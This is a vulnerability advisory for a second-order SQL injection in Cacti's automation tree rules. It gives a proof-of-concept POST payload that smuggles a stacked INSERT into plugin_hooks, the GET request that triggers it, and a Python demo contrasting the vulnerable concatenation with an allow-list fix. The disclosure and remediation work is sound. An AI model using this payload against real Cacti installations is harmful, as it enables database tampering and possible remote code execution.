Summary
Some of the data stored through `automation_tree_rules.php` is not properly validated and is later concatenated into a SQL statement by the `create_all_header_nodes()` function in `lib/api_automation.php`, resulting in a second-order (stored) SQL injection.
Details
1. Store the tainted data
The tainted data is written by the `automation_tree_rules_form_save()` function in `automation_tree_rules.php`. This requires the Automation administrator privilege.

In the database, the `field` column of the `automation_tree_rule_items` table is attacker-controlled and is declared as varchar(255), which leaves room for a sizable payload.

2. Read the tainted data and concatenate it into the SQL statement
The attack starts from the `form_action()` function in `host.php`, which calls `automation_update_device()`.

Alternatively, it can start from the `form_action()` function in `graphs.php`, which calls `automation_execute_graph_create_tree()`.

These two entry points require, respectively, the Sites/Devices/Data permission and the Graphs permission.

Both paths end in `lib/api_automation.php`: when the `field` value of `automation_tree_rule_items` is read back from the database, it is concatenated directly into the `$sql` variable without any check, resulting in SQL injection.


PoC
1. Store the tainted data
Send a POST request to `automation_tree_rules.php` with the following parameters:

```php
$data = [
    'save_component_automation_tree_rule_item' => 1,
    'item_id'        => 1,
    'id'             => 1,
    'sequence'       => 100,
    'field'          => "1;INSERT INTO plugin_hooks VALUES (3,'a','a','../../myVul/FileIncludeofgraph_image/test.php','.','a');#",
    'sort_type'      => 1,
    'search_pattern' => 'TAINT',
    'action'         => 'save',
    '__csrf_magic'   => '',
];
```

Then check the `field` column of the `automation_tree_rule_items` table to confirm that the payload was stored verbatim.

2. Trigger the concatenation of the tainted data
Send a GET request to `http://ip:port/host.php?action=actions&drp_action=6&selected_items=[1]`.
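To make the two stages above concrete, here is an added example (not code from the advisory or from Cacti) that re-creates the flaw described in Details and exercised by the PoC, using Python against an in-memory SQLite database. The schema, the column names, the sample hosts and the `--` line comment (standing in for MySQL's `#`) are assumptions of the demo; `executescript()` stands in for a database layer that accepts stacked statements. `header_sql_vulnerable()` mirrors the unchecked concatenation of the stored `field`, and `header_sql_hardened()` shows the fix a maintainer would apply: allow-list the stored identifier against the table's real column set before it ever reaches the query string.

```python
import re
import sqlite3

# Constructed stand-in schema for the demo; these are assumptions, not Cacti's real tables.
SCHEMA = """
CREATE TABLE host (id INTEGER PRIMARY KEY, hostname TEXT, description TEXT, site_id INTEGER);
CREATE TABLE automation_tree_rule_items (
    id INTEGER PRIMARY KEY, rule_id INTEGER, sequence INTEGER,
    field TEXT, sort_type INTEGER, search_pattern TEXT);
CREATE TABLE plugin_hooks (id INTEGER PRIMARY KEY, name TEXT, hook TEXT,
    file TEXT, function TEXT, status TEXT);
INSERT INTO host VALUES (1, 'router1', 'core router', 1), (2, 'switch1', 'access switch', 1);
"""

# Constructed payload in the shape of the advisory's PoC; '--' replaces MySQL's '#' comment for SQLite.
TAINTED_FIELD = "1;INSERT INTO plugin_hooks VALUES (3,'a','a','../../x/test.php','.','a');-- "

IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def save_rule_item(conn, rule_id, field):
    """Stage 1: the save path is parameterized, so the tainted value lands in the table intact."""
    conn.execute(
        "INSERT INTO automation_tree_rule_items (rule_id, sequence, field, sort_type, search_pattern) "
        "VALUES (?, 100, ?, 1, 'TAINT')",
        (rule_id, field),
    )
    conn.commit()


def load_rule_fields(conn, rule_id):
    """Read the stored column names back, exactly as the tree-building code would."""
    rows = conn.execute(
        "SELECT field FROM automation_tree_rule_items WHERE rule_id = ? ORDER BY sequence",
        (rule_id,),
    )
    return [row[0] for row in rows]


def header_sql_vulnerable(field):
    """Stage 2 as described: the stored column name is concatenated with no check at all."""
    return f"SELECT DISTINCT {field} AS header FROM host ORDER BY {field}"


def run_vulnerable(conn, rule_id):
    """Build and run the header query per stored item; returns the plugin_hooks row count afterwards."""
    for field in load_rule_fields(conn, rule_id):
        # executescript() models a driver that executes stacked statements (demo assumption).
        conn.executescript(header_sql_vulnerable(field))
    return conn.execute("SELECT COUNT(*) FROM plugin_hooks").fetchone()[0]


def header_sql_hardened(conn, field):
    """Allow-list the identifier against the real column set before interpolating it."""
    allowed = {row[1] for row in conn.execute("PRAGMA table_info(host)")}
    if not IDENT_RE.fullmatch(field) or field not in allowed:
        raise ValueError(f"rejected column name {field!r}")
    # Quoted identifier, and only after the value proved to be a known column.
    return f'SELECT DISTINCT "{field}" AS header FROM host ORDER BY "{field}"'


def run_hardened(conn, rule_id):
    """Same flow as run_vulnerable, but every stored field must pass the allow-list first."""
    headers = []
    for field in load_rule_fields(conn, rule_id):
        headers.extend(row[0] for row in conn.execute(header_sql_hardened(conn, field)))
    return headers


def hardened_rejects(conn, rule_id):
    """True when the hardened path refuses the stored rule items instead of running them."""
    try:
        run_hardened(conn, rule_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = new_db()
    save_rule_item(conn, 1, TAINTED_FIELD)
    print("plugin_hooks rows after vulnerable run:", run_vulnerable(conn, 1))
    print("hardened path rejects the stored item:", hardened_rejects(conn, 1))
```

The point the demo makes is that stage 1 is not where the bug is: the save is a clean parameterized INSERT, and a reviewer looking only at the write path would see nothing wrong. The injection happens at stage 2, where a value that was trusted because it "came from the database" is spliced into SQL as an identifier. The fix is therefore an identifier allow-list at the point of use, not escaping at the point of storage.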

Impact
Using this second-order SQL injection, an attacker can modify the contents of the Cacti database; depending on what is modified, further impact may be possible, such as arbitrary file reading, and even remote code execution through arbitrary file writing.
Researcher: ISHGARD-2, USTC